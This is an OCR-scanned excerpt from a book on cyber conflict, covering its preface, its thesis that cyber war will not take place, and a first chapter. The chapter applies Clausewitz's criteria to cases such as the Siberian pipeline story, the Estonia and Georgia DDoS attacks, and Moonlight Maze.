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PREFACE 


The threat of cyber war has captured the popular imagination. Hol¬ 
lywood was quick to realize and express these fears for us. Films like 
Wargames (1983) or, more recently, Die Hard 4.0 (2007) trod the 
obvious narrative path: dark forces mobilizing arcane and complex com¬ 
puter networks to wreak havoc, holding entire nations hostage and 
unleashing nuclear war by hacking into the Pentagon’s vast and powerful 
computer systems. Such fears have always touched a deep nerve. Most 
of us use computers but don’t really understand how hardware and 
software interact. A powerful embodiment of the pervasive human angst 
of losing control to technology itself was HAL, Stanley Kubrick’s ter¬ 
rifying, all-controlling machine aboard a spaceship in 2001: A Space 
Odyssey (1968). As more and more of us as well as more and more things 
go online, such fears cut deeper than ever. 

Most people, young and old, carry a smart phone in their pocket at 
all times. And a great many have become addicted to connectivity, inces¬ 
santly, sometimes furtively, checking their email and social media 
feeds—at the dinner table, on the beach, under the table at business 
meetings, and not just dull ones. An entire generation has grown up 
who believe that their personal and professional well-being depend on 
digital devices and constant connectivity. If you are fiddling with your 
touch screen before your morning coffee is ready, the chances are that 
you intuitively understand that almost everything that enables the rest 
of your day is controlled by computers: the water that flows from the 
tap, the electricity plant that powers your kettle, the traffic lights that 
help you cross the street, the train that takes you to work, the cash 
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machine that gives you money, the lift that you use in the office, the 
plane that gets you to Berlin or Delhi or New York, the navigation sys¬ 
tem you will use to find your way around a less familiar city, and much 
more besides. All these features of life are now commonplace, and unre¬ 
markable—as long as they work. Just as commonplace and insidious is 
the all-pervasive fear that malicious actors lie in wait, at all hours, to 
assault and crash these computers and the software they run, thereby 
bringing entire societies to their knees. Water will stop flowing, the 
lights go out, trains derail, banks lose our financial records, the roads 
descend into chaos, elevators fail, and planes fall from the sky. Nobody, 
this adage has it, is safe from the coming cyber war. Our digital demise 
is only a question of time. 

These fears are diverting. They distract from the real significance of 
cyber security: in several ways, cyber attacks are not creating more vec¬ 
tors of violent interaction; rather they are making previously violent 
interactions less violent. Only in the twenty-first century has it become 
possible for armed forces to cripple radar stations and missile launchers 
without having to bomb an adversary’s air defense system and kill its 
personnel and possibly civilians in the process. Now this can be achieved 
through cyber attack. Only in the twenty-first century did it become 
possible for intelligence agencies to exfiltrate and download vast quan¬ 
tities of secret data through computer breaches, without sending spies 
into dangerous places to bribe, coerce, and possibly harm informants 
and sources first. Only in the twenty-first century can rebels and insur¬ 
gents mobilize dedicated supporters online and get thousands of them 
to take to the streets, without spreading violence and fear to undermine 
the government’s grip on power. 

The ubiquitous rise of networked computers is changing the business 
of soldiers, spies, and subversives. Cyberspace is creating new—and 
often non-violent—opportunities for action. But these new opportuni¬ 
ties come with their own sets of limitations and challenges, applicable 
equally to those trying to defend against new attack vectors as much as 
those seeking to exploit new technology for offensive purposes. This 
book explores the opportunities and challenges that cyberspace is crea¬ 
ting for those who use violence for political purposes, whether they 
represent a government or not. 

The rise of sophisticated computer incursions poses significant risks 
and threats, and understanding these risks and threats and developing 
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adequate responses to mitigate them is of critical importance—so a 
short word on the evolving cyber security debate is appropriate here: the 
debate on cyber security is flawed, and in many quarters its quality is 
abysmally low. The larger debate takes place in technology journals, 
magazines, on specialised web forums, and of course in the mainstream 
media as well as in academia and on blogs and microblogs. It takes place 
at countless workshops and conferences that bring together representa¬ 
tives from the private sector, governments, intelligence agencies and the 
military, as well as hackers and scholars from a variety of academic dis¬ 
ciplines. It happens publicly as well as behind closed doors and in clas¬ 
sified environments. No doubt: a number of deeply versed experts from 
various backgrounds regularly produce high-quality research output on 
cyber security, and this book could not have been written without using 
their good work. But the wider one moves in political or military circles, 
in think tanks, parliaments, ministries, and military academies, the 
lower seems the density of genuine experts and the higher pitched the 
hyperbole. The policy debate’s lagging quality is neatly illustrated by the 
emergence of an odd bit of jargon, the increasing use of the word 
“cyber” as a noun among policy wonks and many a uniformed officer. 
As in, “I’m interested in cyber,” or, “What’s the definition of cyber?,” as 
one civil servant once asked me in sincerity after I recommended in a 
presentation in the Houses of Parliament not to use that empty yet 
trendy buzzword as a noun. Note that computer scientists, program¬ 
mers, or software security experts do not tend to use “cyber” as a noun, 
neither do technology journalists nor serious scholars. I’ve come to be 
highly distrustful of “nouners,” as all too often they don’t seem to appre¬ 
ciate the necessary technical details—the phenomenon can be observed 
widely in Washington, but also in London, Paris, Berlin, and elsewhere. 
Improving the quality of the debate is all the more crucial. The public 
deserves a far better informed, more nuanced, and more realistic debate 
than that which has taken place hitherto. The public also deserves better 
thought-out and executed policies and legislation on cyber security. 

Cyber War Will Not Take Place was written with the ambition of offe¬ 
ring the reader a solid yet accessible contribution to this debate, an 
attempt to help consolidate the discussion, attenuate some of the hype, 
and adequately confront some of the most urgent security challenges. 
The book is designed to be a resource for students, analysts, and journa¬ 
lists. The expert debate on cyber security, as well as taught courses on 
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cyber security, is spread across various academic disciplines, the most 
important of which are political science and computer science, with 
legal studies and sociology not far behind. Readers from either discipline 
will, I hope, find this book insightful: engineers, geeks, and technology 
enthusiasts may benefit from the strategic bird’s-eye-view; policy analysts 
and sociologists may gain something from its accessibly presented tech¬ 
nical details; and students from either field may appreciate both. Howe¬ 
ver, no single author can even hope to cover the full spectrum of cyber 
security, as the long vote of thanks in my acknowledgments makes clear. 
To make the book more approachable, its nine chapters can be read as 
stand-alone essays, each of which presents its own questions, argument 
and set of micro-case studies to illustrate specific points. 

As for the sources used in this book, the most stimulating debates on 
recent cyber security developments are occurring not in scholarly jour¬ 
nals but on a significant number of technology blogs and other websites 
that cannot be described as blogs. Some of the most important longer 
papers and reports are also not published in journals that can be cited 
according to established academic conventions, but on websites of com¬ 
panies and sometimes individuals. I generally cite the commonly used 
details: author name, title, publication forum, and date of publication. 
Readers will be able to find these sources through a quick Google search. 
Only items that may be harder to locate come with a URL. But because 
many URLs are clunky as well as short-lived, I decided to provide a 
bitly.corn-link with statistics instead, for instance, 1 http://bitly.com/ 
OtcuJx+. This link will take the reader to a bitly.com page that shows 
the full link, the date it was first used, and more usage statistics—even 
when that link has expired. 
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THE ARGUMENT 


In the mid-1930s, inspired by Europe’s political descent into the First 
World War over the tragic summer of 1914, the French dramatist Jean 
Giraudoux wrote a famous play, La guerre de Troie n’aura pas lieu (The 
Trojan War Will Not Take Place). The English playwright Christopher 
Fry later translated its two acts in 1955 as Tiger at the Gates} The plot is 
set inside the gates of the city of Troy. Elector, a disillusioned Trojan 
commander, tries to avoid in vain what the seer Cassandra has predicted 
to be inevitable: war with the Greeks. Giraudoux was a veteran of 1914 
and later worked in the Quai d’Orsay, or French Foreign Office. Elis 
tragedy is an eloquent critique of Europe’s leaders, diplomats, and intel¬ 
lectuals who were, again, about to unleash the dogs of war. The play 
premiered in November 1935 in the Theatre de l’Athenee in Paris, 
almost exactly four years before the dramatist’s fears would be realized. 

Judging from recent pronouncements about cyber war, the world 
seems to be facing another 1935-moment. “Cyberwar Is Coming!” 
declared the RAND Corporation’s John Arquilla and David Ronfeldt in 
1993. 2 It took a while for the establishment to catch on. “Cyberspace is 
a domain in which the Air Force flies and fights,” announced Michael 
Wynne, the US secretary of the Air Force, in 2006. Four years later the 
Pentagon leadership joined in. “Although cyberspace is a man-made 
domain,” wrote William Lynn, America’s deputy secretary of defense, in 
a 2010 Foreign Affairs article, it has become “just as critical to military 
operations as land, sea, air, and space.” 3 Richard Clarke, the White 
blouse’s former cyber czar, invokes calamities of a magnitude that make 
9/11 pale in comparison and urges taking several measures “simulta- 


THE ARGUMENT 


neously and now to avert a cyber war disaster.” 4 In February 2011, the 
then CIA Director Leon Panetta warned the House Permanent Select 
Committee on Intelligence: “The next Pearl Harbor could very well be 
a cyber attack.” 5 Panetta later repeated this dire warning as head of the 
Pentagon. In late 2012, Mike McConnell, George W. Bush’s director of 
national intelligence until 2009, warned darkly that America could not 
“wait for the cyber equivalent of the collapse of the World Trade Cen¬ 
ters.” 6 Yet while US politicians were warning of digital doom, America’s 
covert operators were busy unleashing a highly sophisticated computer 
worm, known as Stuxnet, to wreck the Iranian nuclear enrichment pro¬ 
gram at Natanz. One much-noted investigative article in Vanity Fair 
concluded that the event foreshadowed the destructive new face of 
twenty-first-century warfare, “Stuxnet is the Hiroshima of cyber-war.” 7 

But is it? Are the Cassandras on the right side of history? Has cyber 
conflict indeed entered the “fifth domain” of warfare? Is cyber war really 
coming? 

This book argues that cyber war will not take place, a statement that 
is not necessarily accompanied with an ironical Giraudouxian twist. It 
is meant rather as a comment about the past, the present, and the likely 
future: cyber war has never happened in the past, it does not occur in 
the present, and it is highly unlikely that it will disturb our future. Ins¬ 
tead, the opposite is taking place: a computer-enabled assault on vio¬ 
lence itself. All past and present political cyber attacks—in contrast to 
computer crime—are sophisticated versions of three activities that are as 
old as human conflict itself: sabotage, espionage, and subversion. And 
on closer examination, cyber attacks help to diminish rather than accen¬ 
tuate political violence in three discrete ways. First, at the technical 
high-end, weaponized code and complex sabotage operations enable 
highly targeted attacks on the functioning of an adversary’s technical 
systems without directly physically harming the human operators and 
managers of such systems. Even more likely are scenarios of code-borne 
sabotage inflicting significant financial and reputational damage without 
causing any physical harm to hardware at all. Secondly, espionage is 
changing: computer attacks make it possible to exfiltrate data without 
infiltrating humans first in highly risky operations that may imperil 
them. Yet, paradoxically, the better intelligence agencies become at 
“cyber,” the less they are likely to engage in cyber espionage narrowly 
defined. And finally subversion may be becoming less reliant on armed 


xiv 


THE ARGUMENT 


direct action: networked computers and smartphones make it possible 
to mobilize followers for a political cause peacefully. In certain condi¬ 
tions, undermining the collective trust and the legitimacy of an esta¬ 
blished order requires less violence than in the past, when the state may 
have monopolized the means of mass communication. This applies 
especially in the early phases of unrest. 

But offensively minded tech-enthusiasts should hold their breath. For 
these changes in the nature of political violence come with their own 
limitations. And these limitations greatly curtail the utility of cyber 
attacks. Using organized violence and putting trained and specialized 
personnel at risk also has unique benefits that are difficult or impossible 
to replicate in cyberspace. And again these limitations apply to all three 
types of political violence in separate ways. First, for subversives, new 
forms of online organization and mobilization also mean higher mem¬ 
bership mobility, higher dependency on causes, and less of a role for 
leaders who may impose internal cohesion and discipline, possibly by 
coercive means. Starting a movement is now easier, but succeeding is 
more difficult. Second, using pure cyber espionage without human 
informers creates unprecedented difficulties for those trying to put data 
into context, interpret the intelligence, assess it, and turn it into political 
(or commercial) advantage. Getting data is now easier, but not using 
them. Finally, at the technical high-end, it is a massive challenge to use 
cyber weapons as instruments in the service of a wider political goal, not 
just in one-off and impossible-to-repeat sabotage stints that are more 
relevant to geeks with a tunnel view than to heads of states with a bird’s- 
eye perspective. 

The book’s argument is presented in seven chapters. The first chapter 
outlines what cyber war is—or rather what it would be, were it to take 
place. Any attempt to answer this question has to start conceptually. An 
offensive act has to meet certain criteria in order to qualify as an act of 
war: it has to be instrumental; it has to be political; and, most crucially, 
it has to be violent, or at least potentially violent. The second chapter 
considers the altered meaning of violence in the context of cyber attacks. 
The third chapter examines an increasingly popular idea, “cyber wea¬ 
pons,” and discusses the potential as well as the limitations of code- 
borne instruments of harm. The book continues by exploring some 
frequently cited examples of offensive and violent political acts in 
cyberspace case by case. The fourth chapter considers sabotage. To date, 
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the world has not experienced a major physically destructive attack 
against highly vulnerable and badly secured industrial control systems, 
such as power plants, the electricity grid, or other critical utilities—this 
chapter offers an explanation for this conspicuous absence (or perhaps 
delay), and assesses the real risk of potentially crippling future attacks on 
a developed society’s infrastructure. Chapter five scrutinizes espionage by 
means of computer network attack. In many ways, cyber espionage 
represents a paradox: it is almost always a non-violent form of network 
breach that is also the most fundamental and potentially game-changing 
threat to developed nations, mostly for economic reasons rather than for 
reasons of national security, strictly and narrowly defined. Chapter six 
explores perhaps the most widespread form of activism and political 
violence in cyberspace, subversion. Technology, it finds, has lowered the 
entry costs for subversive activity but it has also raised the threshold for 
sustained success. Chapter seven assesses the attribution problem, an 
issue that has been at the root of cyber security. If attribution is recogni¬ 
zed for what it is, as a political rather than a technical problem, then it 
becomes possible to see that the problem itself is a function of an attack’s 
severity. The conclusion offers a summary and hopes to take the debate 
beyond the tired and wasted metaphor of “cyber war.” 8 
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WHAT IS CYBER WAR? 


Carl von Clausewitz still offers the most concise and the most funda¬ 
mental concept of war. Sun Tzu, a much older strategic thinker, often 
made a showing in the debate on information warfare in the 1990s. But 
the ancient Chinese general and philosopher is better known for punchy 
aphorisms than systematic thought—long sections of his book, The Art 
of War, read like a choppy Twitter-feed from 500 BC. Sun’s modern 
Prussian nemesis offers a far more coherent and finely tuned toolset for 
rigorous analysis. Clausewitz’s concepts and ideas, although limited in 
many ways, continue to form the core vocabulary of professionals and 
experts in the use of force. Clausewitz identifies three main criteria any 
aggressive or defensive action that aspires to be a stand-alone act of war, 
or may be interpreted as such, has to meet all three. Past cyber attacks 
do not. 

The first element is war’s violent character. “War is an act of force to 
compel the enemy to do our will,” wrote Clausewitz on the first page of 
On War. 1 All war, pretty simply, is violent. If an act is not potentially 
violent, it’s not an act of war and it’s not an armed attack—in this 
context the use of the word will acquire a metaphorical dimension, as in 
the “war” on obesity or the “war” on cancer. A real act of war or an 
armed attack is always potentially or actually lethal, at least for some 
participants on at least one side. Unless physical violence is stressed, war 
is a hodgepodge notion, to paraphrase Jack Gibbs. 2 The same applies to 
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the idea of a weapon. In Clausewitz’s thinking, violence is the pivotal 
point of all war. Both enemies—he usually considered two sides—would 
attempt to escalate violence to the extreme, unless tamed by friction, 
imponderables, and politics. 3 

The second element highlighted by Clausewitz is war’s instrumental 
character. An act of war is always instrumental, and to be instrumental 
there has to be a means and an end: physical violence or the threat of 
force is the means ; forcing the enemy to accept the offender’s will is the 
end. Such a definition is “theoretically necessary,” Clausewitz argued. 4 To 
achieve the end of war, one opponent has to be rendered defenseless. Or, 
to be more precise, the opponent has to be brought into a position, 
against their will, where any change of that position brought about by 
the continued use of arms would only bring more disadvantages, at least 
in that opponent’s view. Complete defenselessness is only the most 
extreme of those positions. Both opponents in a war use violence in this 
instrumental way, shaping each other’s behavior, giving each other the 
law of action, in the words of the Prussian philosopher of war. 5 The 
instrumental use of means takes place on tactical, operational, strategic, 
and political levels. The higher the order of the desired goal, the more 
difficult it is to achieve. As Clausewitz put it, in the slightly stilted lan¬ 
guage of his time: “The purpose is a political intention, the means is 
war; never can the means be understood without the purpose.” 6 

This leads to the third and most central feature of war—its political 
nature. An act of war is always political. The objective of battle, to 
“throw” the enemy and to make him defenseless, may temporarily blind 
commanders and even strategists to the larger purpose of war. War is 
never an isolated act, nor is it ever only one decision. In the real world, 
war’s larger purpose is always a political purpose. It transcends the use 
of force. This insight was famously captured by Clausewitz’s most 
famous phrase, “War is a mere continuation of politics by other means.” 7 
To be political, a political entity or a representative of a political entity, 
whatever its constitutional form, has to have an intention, a will. That 
intention has to be articulated. And one side’s will has to be transmitted 
to the adversary at some point during the confrontation (it does not 
have to be publicly communicated). A violent act and its larger political 
intention must also be attributed to one side at some point during the 
confrontation. History does not know of acts of war without eventual 
attribution. 8 
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One modification is significant before applying these criteria to cyber 
offenses. The pivotal element of any warlike action remains the “act of 
force.” An act of force is usually rather compact and dense, even when 
its components are analyzed in detail. In most armed confrontations, be 
they conventional or unconventional, the use of force is more or less 
straightforward: it may be an F-16 striking targets from the air, artillery 
barrages, a drone-strike, improvised explosive devices placed by the side 
of a road, even a suicide bomber in a public square. In all these cases, a 
combatant’s or an insurgent’s triggering action—such as pushing a but¬ 
ton or pulling a trigger—will immediately and directly result in casual¬ 
ties, even if a timer or a remote control device is used, as with a drone 
or a cruise missile, and even if a programmed weapon system is able to 
semi-autonomously decide which target to engage or not. 9 An act of 
cyber war would be an entirely different game. 

In an act of cyber war, the actual use of force is likely to be a far more 
complex and mediated sequence of causes and consequences that ulti¬ 
mately result in violence and casualties. 10 One often-invoked scenario is 
a Chinese cyber attack on the US homeland in the event of a political 
crisis in, say, the Taiwan Straits. The Chinese could blanket a major city 
with blackouts by activating so-called logic-bombs that had been pre¬ 
installed in America’s electricity grid. Financial information could be 
lost on a massive scale. Derailments could crash trains. Air traffic sys¬ 
tems and their backups could collapse, leaving hundreds of planes aloft 
without communication. Industrial control systems of highly sensitive 
plants, such as nuclear power stations, could be damaged, potentially 
leading to loss of cooling, meltdown, and contamination 11 —people 
could suffer serious injuries or even be killed. Military units could be 
rendered defenseless. In such a scenario, the causal chain that links 
somebody pushing a button to somebody else being hurt is mediated, 
delayed, and permeated by chance and friction. Yet such mediated des¬ 
truction caused by a cyber offense could, without doubt, be an act of 
war, even if the means were not violent, only the consequences. 12 
Moreover, in highly networked societies, non-violent cyber attacks could 
cause economic consequences without violent effects that could exceed 
the harm of an otherwise smaller physical attack. 13 For one thing, such 
scenarios have caused widespread confusion, “Rarely has something 
been so important and so talked about with less clarity and less apparent 
understanding than this phenomenon,” commented Michael Hayden, 
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formerly director of the Central Intelligence Agency (CIA) as well as the 
National Security Agency (NSA). 14 And secondly, to date all such sce¬ 
narios have another major shortfall: they remain fiction, not to say 
science fiction. 

If the use of force in war is violent, instrumental, and political, then 
there is no cyber offense that meets all three criteria. But more than that, 
there are very few cyber attacks in history that meet only one of these 
criteria. It is useful to consider the most-quoted offenses case by case, 
and criterion by criterion. 

The most violent “cyber” attack to date is likely to have been a Sibe¬ 
rian pipeline explosion—if it actually happened. In 1982, a covert Ame¬ 
rican operation allegedly used rigged software to cause a massive 
explosion in Russia’s Urengoy-Surgut-Chelyabinsk pipeline, which 
connected the Urengoy gas fields in Siberia across Kazakhstan to Euro¬ 
pean markets. The gigantic pipeline project required sophisticated 
control systems for which the Soviet operators had to purchase compu¬ 
ters on open markets. The Russian pipeline authorities tried to acquire 
the necessary Supervisory Control and Data Acquisition software, 
known as SCAD A, from the United States but were turned down. The 
Russians then attempted to get the software from a Canadian firm. The 
CIA is said to have succeeded in inserting malicious code into the 
control system that ended up being installed in Siberia. The code that 
controlled pumps, turbines, and valves was programmed to operate 
normally for a time and then “to reset pump speeds and valve settings to 
produce pressures far beyond those acceptable to pipeline joints and 
welds,” recounted Thomas Reed, an official in the National Security 
Council at the time. 15 In June 1982, the rigged valves probably resulted 
in a “monumental” explosion and fire that could be seen from space. 
The US Air Force reportedly rated the explosion at 3 kilotons, equiva¬ 
lent to a small nuclear device. 16 

But there are three problems with this story. The first pertains to the 
Russian sources. When Reed’s book came out in 2004, Vasily Pchelint- 
sev, a former KGB head of the Tyumen region where the alleged explo¬ 
sion was supposed to have taken place, denied the story. He surmised 
that Reed might have been referring to an explosion that happened not 
in June but on a warm April day that year, 50 kilometers from the city 
of Tobolsk, caused by shifting pipes in the thawing ground of the tun¬ 
dra. No one was hurt in that explosion. 17 There are no media reports 
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from 1982 that would confirm Reed’s alleged explosion, although regu¬ 
lar accidents and pipeline explosions in the USSR were reported in the 
early 1980s. Later Russian sources also fail to mention the incident. In 
1990, when the Soviet Union still existed, Lieutenant General Nikolai 
Brusnitsin published a noteworthy and highly detailed small book, 
translated as Openness and Espionage. Brusnitsin was the deputy chair¬ 
man of the USSR’s State Technical Commission at the time. His book 
has a short chapter on “computer espionage,” where he discusses several 
devices that Soviet intelligence had discovered over previous years. He 
recounts three different types of discoveries: finding “blippers” inserted 
into packages to monitor where imported equipment would be instal¬ 
led; finding “additional electronic ‘units’ which have nothing to do with 
the machine itself,” designed to pick up and relay data; and finding 
“gimmicks which render a computer totally inoperative” by destroying 
“both the computer software and the memory.” 18 Brusnitsin even provi¬ 
ded examples. The most drastic example was a “virus,” the general wrote, 
implanted in a computer that was sold by a West German firm to a 
Soviet shoe factory. It is not unreasonable to assume that if the pipeline 
blitz had happened, Brusnitsin would have known about it and most 
likely written about it, if not naming the example then at least naming 
the possibility of hardware sabotage. He did not do that. 

A second problem concerns the technology that was available at the 
time. It is uncertain if a “logic bomb” in 1982 could have been hidden 
easily. Retrospectively analyzing secretly modified software in an indus¬ 
trial control system three decades after the fact is difficult to impossible. 
But a few generalizations are possible: at the time technology was far 
simpler. A system controlling pipelines in the early 1980s would pro¬ 
bably have been a fairly simple “state machine,” and it would probably 
have used an 8-bit micro-controller. Back in 1982, it was most likely still 
possible to test every possible output that might be produced by all pos¬ 
sible inputs. (This is not feasible with later microprocessors.) Any hidden 
outputs could be discovered by such a test—an input of “X” results in 
dangerous output “Y.” 19 Testing the software for flaws, in other words, 
would have been rather easy. Even with the technology available at the 
time, a regression test would have needed less than a day to complete, 
estimated Richard Chirgwin, a long-standing technology reporter. 20 In 
short, in 1982 it was far more difficult to “hide” malicious software. 

Thirdly, even after the CIA declassified the so-called Farewell Dossier, 
which described the effort to provide the Soviet Union with defective 
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technology, the agency did not confirm that such an explosion took 
place. If it happened, it is unclear if the explosion resulted in casualties. 
The available evidence on the event is so thin and questionable that it 
cannot be counted as a proven case of a successful logic bomb. 

Another oft-quoted example of cyber war is an online onrush on 
Estonia that began in late April 2007. At that time Estonia was one of 
the world’s most connected nations; two-thirds of all Estonians used the 
Internet and 95 per cent of banking transactions were done electroni¬ 
cally. 21 The small and well-wired Baltic country was vulnerable to cyber 
attacks. The story behind the much-cited incident started about two 
weeks before 9 May, a highly emotional day in Russia when the victory 
against Nazi Germany is remembered. With indelicate timing, authori¬ 
ties in Tallinn decided to move the two-meter Bronze Soldier, a Russian 
Second World War memorial of the Unknown Soldier, from the center 
of the capital to its outskirts. The Russian-speaking population, as well 
as neighboring Russia, was aghast. On 26 and 27 April, Tallinn saw 
violent street riots, with 1,300 arrests, 100 injuries, and one fatality. 

The street riots were accompanied by online commotions. The cyber 
attacks started in the late hours of Friday, 27 April. Initially the offen¬ 
ders used rather inept, low-tech methods, such as ping floods or denial 
of service (DoS) attacks—basic requests for information from a server, 
as when an Internet user visits a website by loading the site’s content. 
Then the assault became slightly more sophisticated. Starting on 30 
April, simple botnets were used to increase the volume of distributed 
denial of service (DDoS) attacks, and the timing of these collective acti¬ 
vities became increasingly coordinated. Other types of nuisances 
included email and comment spam as well as the defacement of the 
Estonian Reform Party’s website. Estonia experienced what was then the 
worst-ever DDoS. The attacks came from an extremely large number of 
hijacked computers, up to 85,000, and they went on for an unusually 
long time, for three weeks, until 19 May. The attacks reached a peak on 
9 May, when Moscow celebrates Victory Day. Fifty-eight Estonian web¬ 
sites were brought down at once. The online services of Estonia’s largest 
bank, Elansapank, were unavailable for ninety minutes on 9 May and 
for two hours a day later. 22 The effect of these coordinated online pro¬ 
tests on business, government, and society was noticeable, but ultima¬ 
tely remained minor. The only long-term consequence of the incident 
was that the Estonian government succeeded in getting NATO to esta- 
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blish a permanent agency in Tallinn, the Cooperative Cyber Defence 
Centre of Excellence. 

A few things are notable about the story. It remained unclear who was 
behind the attacks. Estonia’s defense minister as well as the country’s top 
diplomat pointed their fingers at the Kremlin, but they were unable to 
muster evidence, retracting earlier statements that Estonia had been able 
to trace the IP addresses of some of the computers involved in the attack 
back to the Russian government. Neither experts from the Atlantic 
Alliance nor from the European Commission were able to identify Rus¬ 
sian fingerprints in the operations. Russian officials described the accu¬ 
sations of their involvement as “unfounded.” 23 

Keeping Estonia’s then-novel experience in perspective is important. 
Mihkel Tammet, an official in charge of ICT for the Estonian Ministry 
of Defense, described the time leading up to the launch of the attacks as 
a “gathering of botnets like a gathering of armies.” 24 Andrus Ansip, then 
Estonia’s prime minister, asked, “What’s the difference between a bloc¬ 
kade of harbors or airports of sovereign states and the blockade of 
government institutions and newspaper web sites?” 25 It was of course a 
rhetorical question. Yet the answer is simple: unlike a naval blockade, 
the mere “blockade” of websites is not violent, not even potentially; 
unlike a naval blockade, the DDoS assault was not instrumentally tied 
to a tactical objective, but rather to an act of undirected protest; and 
unlike ships blocking the way, the pings remained anonymous, without 
political backing. Ansip could have asked what the difference was 
between a large popular demonstration blocking access to buildings and 
the blocking of websites. The comparison would have been more ade¬ 
quate, but still flawed for an additional reason: many more actual people 
have to show up for a good old-fashioned demonstration. 

A year later a third major event occurred that would enter the Cas¬ 
sandra’s tale of cyber war. The context was the ground war between the 
Russian Federation and Georgia in August of 2008. The short armed 
confrontation was triggered by a territorial dispute over South Ossetia. 
On 7 August, the Georgian army reacted to provocations by attacking 
South Ossetia’s separatist forces. One day later, Russia responded mili¬ 
tarily. Yet a computer attack on Georgian websites had started slowly on 
29 July, weeks before the military confrontation and with it the main 
cyber offense, both of which started on 8 August. This may have been 
the first time that an independent cyber attack has taken place in sync 
with a conventional military operation. 26 
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The cyber attacks on Georgia comprised three different types. Some 
of the country’s prominent websites were defaced, for instance that of 
Georgias National Bank and the Ministry of Poreign Affairs. The most 
notorious defacement was a collage of portraits juxtaposing Adolf Hitler 
and Mikheil Saakashvili, the Georgian president. The second type of 
offense was denial-of-service attacks against websites in the Georgian 
public and private sectors, including government websites and that of 
the Georgian parliament, but also news media, Georgia’s largest com¬ 
mercial bank, and other minor websites. The online onslaughts, on 
average, lasted around two hours and fifteen minutes, the longest up to 
six hours. 27 A third method was an effort to distribute malicious software 
to deepen the ranks of the attackers and the volume of attacks. Various 
Russian-language forums helped distribute scripts that enabled the 
public to take action, even posting the attack script in an archived ver¬ 
sion, war.rar, which prioritized Georgian government websites. In a 
similar vein, the email accounts of Georgian politicians were spammed. 

The effects of the episode were again rather minor. Despite the war¬ 
like rhetoric of the international press, the Georgian government, and 
anonymous hackers, the attacks were not violent. And Georgia, a small 
country with a population of 4.6 million, was far less vulnerable to 
attacks than Estonia; web access was relatively low and few vital services 
like energy, transportation, or banking were tied to the Internet. The 
entire affair had little effect beyond making a number of Georgian 
government websites temporarily inaccessible. The attack was also only 
minimally instrumental. The National Bank of Georgia ordered all 
branches to stop offering electronic services for ten days. The main 
damage caused by the attack was in limiting the government’s ability to 
communicate internationally, thus preventing the small country’s voice 
being heard at a critical moment. If the attackers intended this effect, its 
utility was limited: the foreign ministry took a rare step, with Google’s 
permission, and set up a blog on Blogger, the company’s blogging plat¬ 
form. This helped keep one more channel to journalists open. Most 
importantly, the offense was not genuinely political in nature. As in the 
Estonian case, the Georgian government blamed the Kremlin. But Rus¬ 
sia again denied official sponsorship of the attacks. NATO’s Tallinn- 
based cyber security center later published a report on the Georgia 
attacks. Although the onrush appeared coordinated and instructed, and 
although the media were pointing fingers at Russia, “there is no conclu- 
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sive proof of who is behind the DDoS attacks,” NATO concluded, “as 
was the case with Estonia.” 28 

The cyber scuffles that accompanied the street protests in Estonia and 
the short military ground campaign in Georgia were precedents. Perhaps 
the novelty of these types of offenses was the main reason for their high 
public profile and the warlike rhetoric that surrounded them. The same 
observation might be true for another type of “cyber war,” high-profile 
spying operations, an early example of which is Moonlight Maze. This 
lurid name was given to a highly classified cyber espionage incident that 
was discovered in 1999. The US Air Force coincidentally discovered an 
intrusion into its network, and the Federal Bureau of Investigation (FBI) 
was alerted. The federal investigators called the NSA. An investigation 
uncovered a pattern of intrusion into computers at the National Aero¬ 
nautics and Space Administration (NASA), at the Department of Energy, 
and at universities as well as research laboratories, which had started in 
March 1998. Maps of military installations were copied, as were hard¬ 
ware designs and other sensitive information. The incursions went on for 
almost two years. The Department of Defense (DoD) was able to trace 
the attack to what was then called a mainframe computer in Russia. But 
again: no violence, unclear goals, no political attribution. 

Yet the empirical trend is obvious: over the past dozen years, cyber 
attacks have been steadily on the rise. The frequency of major security 
breaches against governmental and corporate targets has grown. The 
volume of attacks is increasing, as is the number of actors participating 
in such episodes, ranging from criminals to activists to the NSA. The 
range of aggressive behavior online is widening. At the same time the 
sophistication of some attacks has reached new heights, and in this res¬ 
pect Stuxnet has indeed been a game-changing event. Yet despite these 
trends the “war” in “cyber war” ultimately has more in common with 
the “war” on obesity than with the Second World War—it has more 
metaphorical than descriptive value. It is high time to go back to classic 
terminology and understand cyber offenses for what they really are. 

Aggression, whether it involves computers or not, can be criminal or 
political in nature. It is useful to group offenses along a spectrum, 
stretching from ordinary crime all the way up to conventional war. A few 
distinctive features then become visible: crime is mostly apolitical, war is 
always political; criminals conceal their identity, uniformed soldiers dis¬ 
play their identity openly. Political violence (or “political crime” in cri- 
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minology and the theory of law) occupies the muddled middle of this 
spectrum, being neither ordinary crime nor ordinary war. Lor reasons of 
simplicity, this middle stretch of the spectrum will be divided into three 
segments here: subversion, espionage, and sabotage. All three activities 
may involve states as well as private actors. Cyber offenses tend to be 
skewed towards the criminal end of the spectrum. So far there is no 
known act of cyber “war,” when war is properly defined. This of course 
does not mean that there are no political cyber offenses. But all known 
political cyber offenses, criminal or not, are neither common crime nor 
common war. Their purpose is subverting, spying, or sabotaging. 

In all three cases, Clausewitz’s three criteria are jumbled. These activi¬ 
ties need not be violent to be effective. They need not be instrumental 
to work, as subversion may often be an expression of collective passion 
and espionage may be an outcome of opportunity rather than strategy. 
And finally: aggressors engaging in subversion, espionage, or sabotage 
do act politically: but in sharp contrast to warfare, they are likely to have 
a permanent or at least a temporary interest in avoiding attribution. This 
is one of the main reasons why political crime, more than acts of war, 
has thrived online, where non-attribution is easier to achieve than water¬ 
proof attribution. It goes without saying that subversion, espionage, and 
sabotage—digitally facilitated or not—may accompany military opera¬ 
tions. Both sides may engage in these activities, and have indeed done 
so since time immemorial. But the advent of digital networks had an 
uneven effect. Understanding this effect requires surveying the founda¬ 
tion: the notion of violence. 
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On 6 September 2007 the Israeli Air Force bombed the construction 
site of a nuclear reactor at Dayr ez-Zor in Northern Syria. To prepare the 
air raid, a secret Israeli agency neutralized a single Syrian radar site at 
Tall al-Abuad, close to the Turkish border. To do so, the Israelis probably 
used computer sabotage. This intrusion achieved something that would 
previously have required the physical destruction of radar installations, 
damaging property, potentially hurting or killing some of the system’s 
operators, and possibly innocent civilians: a missile strike or an infiltra¬ 
tion of Special Forces teams to blow up the site would have been the 
conventional alternative. So the outcome of the cyber attack was in 
some ways equivalent to that of a physical attack: a disabled air defense 
system. But was the cyber attack violent? 

Any serious discussion of cyber war necessarily rests on a foundation. 
This foundation is our understanding of the nature of violence, and by 
extension our understanding of violence in cyberspace. And as with 
cyber war and cyber weapons, understanding the nature of violence in 
cyberspace means understanding the nature of the former phenomenon 
